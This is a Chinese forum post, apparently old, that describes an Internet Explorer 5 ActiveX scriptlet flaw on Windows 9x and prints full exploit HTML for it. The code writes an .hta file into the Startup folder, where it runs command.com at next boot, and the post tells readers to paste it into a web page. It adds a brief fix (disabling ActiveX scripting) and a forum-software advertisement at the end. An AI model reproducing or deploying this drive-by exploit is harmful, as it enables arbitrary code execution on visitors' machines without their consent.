***黑客性质***ping一下98就死翘了
把下列代码加到网页的<body></body>标签之间 从google下载我的照片管理软件在win9x下(不知道在nt下的情况),ie5可以利用生成或者覆盖本地文件的方法来执行本地计算机中的任意程序,这个问题出在activex control "object for co nstructing type libraries for scriptlets"。它允许生成和覆盖本地文件,或者在任意文件中增加更多的一些内容。那么一段利用了这个漏洞的html就可以
写入一个html application file(*.hta)到开始菜单里面“程序”中的“启动” ,当用户再次启动机器(或者被强迫重启),那么这个html application文件就 会被执行。这个漏洞可以通过e-mail来执行。
这里提供一个示范的地址:http://www.nat.bg/~joro/scrtlb.html
代码如下:
<object id="scr"
classid="clsid:06290bd5-48aa-11d2-8432-006008c3fbfc"
>
</object>
<script>
scr.reset();
scr.path="c:\\windows\\start menu\\programs\\startup\\guninski.hta
";
scr.doc="<object id='wsh'
classid='clsid:f935dc22-1cf0-11d0-adb9-00c04fd58a0b'></object><scr
ipt>alert('written
by georgi guninski
http://www.nat.bg/~joro');wsh.run('c:\\command.com');</"+"script>"
;
scr.write();
</script>
</object>
解决方法:
把activex scripting关掉,或者不使用activex control及其插件。
--------------------------------------
拥有三人行论坛管理系列软件,一个人就可以管理一个论坛的更新维护。还能使您的论坛有千人在线的真实火暴效果,让您不在为论坛因没有人气而留不住会员而烦恼,使您的论坛早日成为一流的论坛。详情请登陆网站:http://www.cnsrx.cn 三人行论坛管理软件,站长必备的专业好工具。(您使用的是免费版本,购买收费版本后,将不带广告。业务QQ:247216 44985227)
页:
[1]